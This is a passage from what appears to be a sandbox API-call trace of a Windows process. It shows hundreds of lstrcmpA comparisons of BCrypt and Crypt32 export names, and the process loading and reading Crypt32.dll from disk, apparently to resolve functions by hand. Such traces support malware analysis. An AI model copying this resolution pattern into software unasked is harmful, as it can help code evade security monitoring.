lpString2="BCryptDestroyHash") returned 1 [0155.917] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroyKey") returned 1 [0155.917] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroySecret") returned 1 [0155.917] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDuplicateHash") returned 1 [0155.917] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDuplicateKey") returned 1 [0155.917] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEncrypt") returned 1 [0155.917] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEnumAlgorithms") returned 1 [0155.917] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEnumContextFunctionProviders") returned 0 [0155.917] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptAddContextFunction") returned 1 [0155.917] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptAddContextFunctionProvider") returned 1 [0155.917] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0155.917] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptConfigureContext") returned 1 [0155.917] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptConfigureContextFunction") returned 1 [0155.917] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateContext") returned 1 [0155.917] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateHash") returned 1 [0155.918] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateMultiHash") returned 1 [0155.918] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDecrypt") returned 1 [0155.918] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeleteContext") returned 1 [0155.918] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKey") returned 1 [0155.918] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKeyCapi") returned 1 [0155.918] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0155.918] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroyHash") returned 1 [0155.918] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroyKey") returned 1 [0155.918] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroySecret") returned 1 [0155.918] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDuplicateHash") returned 1 [0155.918] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDuplicateKey") returned 1 [0155.919] GetProcessHeap () returned 0x4d0000 [0155.919] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2c42010 | out: hHeap=0x4d0000) returned 1 [0155.919] GetProcessHeap () returned 0x4d0000 [0155.919] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x10) returned 0x4e90d0 [0155.919] LoadLibraryA (lpLibFileName="Crypt32.dll") returned 0x7ffc5c190000 [0155.998] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0155.998] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0155.998] GetModuleFileNameA (in: hModule=0x7ffc5c190000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\Crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")) returned 0x1f [0155.998] CreateFileA (lpFileName="C:\\Windows\\system32\\Crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0155.999] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0155.999] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0155.999] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1847520) returned 1 [0155.999] GetProcessHeap () returned 0x4d0000 [0155.999] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x1c30e0) returned 0x4005040 [0156.003] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0156.003] ReadFile (in: hFile=0x160, lpBuffer=0x4005040, nNumberOfBytesToRead=0x1c30e0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4005040*, lpNumberOfBytesRead=0x14f5a4*=0x1c30e0, lpOverlapped=0x0) returned 1 [0156.102] CloseHandle (hObject=0x160) returned 1 [0156.102] lstrcmpA (lpString1="CertAddCRLContextToStore", lpString2="CertAddCRLContextToStore") returned 0 [0156.103] lstrcmpA (lpString1="CertAddCRLLinkToStore", lpString2="CertAddCRLContextToStore") returned 1 [0156.103] lstrcmpA (lpString1="CertAddCRLLinkToStore", lpString2="CertAddCRLLinkToStore") returned 0 [0156.103] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCRLContextToStore") returned 1 [0156.103] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0156.103] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCTLContextToStore") returned 0 [0156.103] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCRLContextToStore") returned 1 [0156.103] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0156.103] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCTLContextToStore") returned 1 [0156.103] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCTLLinkToStore") returned 0 [0156.103] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCRLContextToStore") returned -1 [0156.103] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCRLLinkToStore") returned -1 [0156.103] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCTLContextToStore") returned -1 [0156.103] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCTLLinkToStore") returned -1 [0156.103] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCertificateContextToStore") returned 0 [0156.103] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCRLContextToStore") returned -1 [0156.103] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCRLLinkToStore") returned -1 [0156.103] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCTLContextToStore") returned -1 [0156.103] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCTLLinkToStore") returned -1 [0156.103] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0156.103] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCertificateLinkToStore") returned 0 [0156.103] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCRLContextToStore") returned 1 [0156.103] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0156.103] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCTLContextToStore") returned 1 [0156.103] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0156.103] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0156.104] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0156.104] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddEncodedCRLToStore") returned 0 [0156.104] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCRLContextToStore") returned 1 [0156.104] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0156.104] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCTLContextToStore") returned 1 [0156.104] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0156.104] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0156.104] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0156.104] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0156.104] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddEncodedCTLToStore") returned 0 [0156.104] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCRLContextToStore") returned 1 [0156.104] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0156.104] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCTLContextToStore") returned 1 [0156.104] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0156.104] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0156.104] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0156.104] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCRLToStore") returned -1 [0156.104] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCTLToStore") returned -1 [0156.104] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCertificateToStore") returned 0 [0156.104] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCRLContextToStore") returned 1 [0156.105] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCRLLinkToStore") returned 1 [0156.105] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCTLContextToStore") returned 1 [0156.105] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCTLLinkToStore") returned 1 [0156.105] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCertificateContextToStore") returned 1 [0156.105] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCertificateLinkToStore") returned 1 [0156.105] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCRLToStore") returned -1 [0156.105] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCTLToStore") returned -1 [0156.105] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCertificateToStore") returned 1 [0156.105] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 0 [0156.105] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCRLContextToStore") returned 1 [0156.105] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCRLLinkToStore") returned 1 [0156.105] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCTLContextToStore") returned 1 [0156.105] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCTLLinkToStore") returned 1 [0156.105] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCertificateContextToStore") returned 1 [0156.105] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCertificateLinkToStore") returned 1 [0156.106] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCRLToStore") returned -1 [0156.106] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCTLToStore") returned -1 [0156.106] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToStore") returned 1 [0156.106] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0156.106] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 0 [0156.106] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCRLContextToStore") returned 1 [0156.106] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCRLLinkToStore") returned 1 [0156.106] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCTLContextToStore") returned 1 [0156.106] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCTLLinkToStore") returned 1 [0156.106] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCertificateContextToStore") returned 1 [0156.106] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCertificateLinkToStore") returned 1 [0156.106] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCRLToStore") returned 1 [0156.106] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCTLToStore") returned 1 [0156.107] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToStore") returned 1 [0156.107] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0156.107] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0156.107] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 0 [0156.107] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCRLContextToStore") returned 1 [0156.107] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCRLLinkToStore") returned 1 [0156.107] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCTLContextToStore") returned 1 [0156.107] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCTLLinkToStore") returned 1 [0156.107] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCertificateContextToStore") returned 1 [0156.107] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCertificateLinkToStore") returned 1 [0156.107] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCRLToStore") returned 1 [0156.107] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCTLToStore") returned 1 [0156.107] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToStore") returned 1 [0156.107] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0156.107] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0156.107] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0156.107] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddRefServerOcspResponse") returned 0 [0156.107] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCRLContextToStore") returned 1 [0156.107] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCRLLinkToStore") returned 1 [0156.107] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCTLContextToStore") returned 1 [0156.107] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCTLLinkToStore") returned 1 [0156.107] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCertificateContextToStore") returned 1 [0156.107] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCertificateLinkToStore") returned 1 [0156.107] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCRLToStore") returned 1 [0156.107] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCTLToStore") returned 1 [0156.107] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToStore") returned 1 [0156.107] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0156.108] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0156.108] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0156.108] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddRefServerOcspResponse") returned 1 [0156.108] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddRefServerOcspResponseContext") returned 0 [0156.108] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCRLContextToStore") returned 1 [0156.108] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0156.108] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCTLContextToStore") returned 1 [0156.108] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0156.108] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0156.108] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0156.108] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0156.108] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCTLToStore") returned 1 [0156.108] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToStore") returned 1 [0156.108] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0156.108] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0156.108] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0156.108] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddRefServerOcspResponse") returned 1 [0156.108] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0156.108] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddSerializedElementToStore") returned 0 [0156.108] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCRLContextToStore") returned 1 [0156.108] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCRLLinkToStore") returned 1 [0156.108] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCTLContextToStore") returned 1 [0156.108] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCTLLinkToStore") returned 1 [0156.108] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCertificateContextToStore") returned 1 [0156.108] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCertificateLinkToStore") returned 1 [0156.108] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCRLToStore") returned 1 [0156.108] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCTLToStore") returned 1 [0156.108] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToStore") returned 1 [0156.109] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0156.109] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0156.109] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0156.109] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddRefServerOcspResponse") returned 1 [0156.109] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0156.109] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddSerializedElementToStore") returned 1 [0156.109] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddStoreToCollection") returned 0 [0156.109] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCRLContextToStore") returned 1 [0156.109] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCRLLinkToStore") returned 1 [0156.109] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCTLContextToStore") returned 1 [0156.109] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCTLLinkToStore") returned 1 [0156.109] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCertificateContextToStore") returned 1 [0156.109] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCertificateLinkToStore") returned 1 [0156.109] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCRLToStore") returned 1 [0156.109] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCTLToStore") returned 1 [0156.109] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToStore") returned 1 [0156.109] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0156.109] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0156.109] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0156.109] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddRefServerOcspResponse") returned 1 [0156.109] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0156.109] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddSerializedElementToStore") returned 1 [0156.109] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddStoreToCollection") returned 1 [0156.109] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAlgIdToOID") returned 0 [0156.109] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCRLContextToStore") returned 1 [0156.109] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCRLLinkToStore") returned 1 [0156.109] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCTLContextToStore") returned 1 [0156.109] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCTLLinkToStore") returned 1 [0156.109] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCertificateContextToStore") returned 1 [0156.109] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCertificateLinkToStore") returned 1 [0156.110] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCRLToStore") returned 1 [0156.110] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCTLToStore") returned 1 [0156.110] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToStore") returned 1 [0156.110] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0156.110] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0156.110] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0156.110] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddRefServerOcspResponse") returned 1 [0156.110] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0156.110] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddSerializedElementToStore") returned 1 [0156.110] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddStoreToCollection") returned 1 [0156.110] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAlgIdToOID") returned 1 [0156.110] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertCloseServerOcspResponse") returned 0 [0156.110] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCRLContextToStore") returned 1 [0156.110] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCRLLinkToStore") returned 1 [0156.110] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCTLContextToStore") returned 1 [0156.110] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCTLLinkToStore") returned 1 [0156.110] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCertificateContextToStore") returned 1 [0156.110] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0156.110] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0156.110] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCTLToStore") returned 1 [0156.110] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToStore") returned 1 [0156.110] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0156.110] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0156.110] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0156.110] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddRefServerOcspResponse") returned 1 [0156.110] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0156.110] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddSerializedElementToStore") returned 1 [0156.110] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddStoreToCollection") returned 1 [0156.110] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAlgIdToOID") returned 1 [0156.110] lstrcmpA (lpString1="CertCloseStore", lpString2="CertCloseServerOcspResponse") returned 1 [0156.110] lstrcmpA (lpString1="CertCloseStore", lpString2="CertCloseStore") returned 0 [0156.111] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCRLContextToStore") returned 1 [0156.111] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCRLLinkToStore") returned 1 [0156.111] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCTLContextToStore") returned 1 [0156.111] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCTLLinkToStore") returned 1 [0156.111] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCertificateContextToStore") returned 1 [0156.111] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCertificateLinkToStore") returned 1 [0156.111] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCRLToStore") returned 1 [0156.111] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCTLToStore") returned 1 [0156.111] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToStore") returned 1 [0156.111] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0156.111] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0156.111] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0156.111] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddRefServerOcspResponse") returned 1 [0156.111] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0156.111] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddSerializedElementToStore") returned 1 [0156.111] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddStoreToCollection") returned 1 [0156.111] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAlgIdToOID") returned 1 [0156.111] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCloseServerOcspResponse") returned 1 [0156.111] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCloseStore") returned 1 [0156.111] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCompareCertificate") returned 0 [0156.111] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCRLContextToStore") returned 1 [0156.111] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCRLLinkToStore") returned 1 [0156.111] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCTLContextToStore") returned 1 [0156.111] lstrcmpA 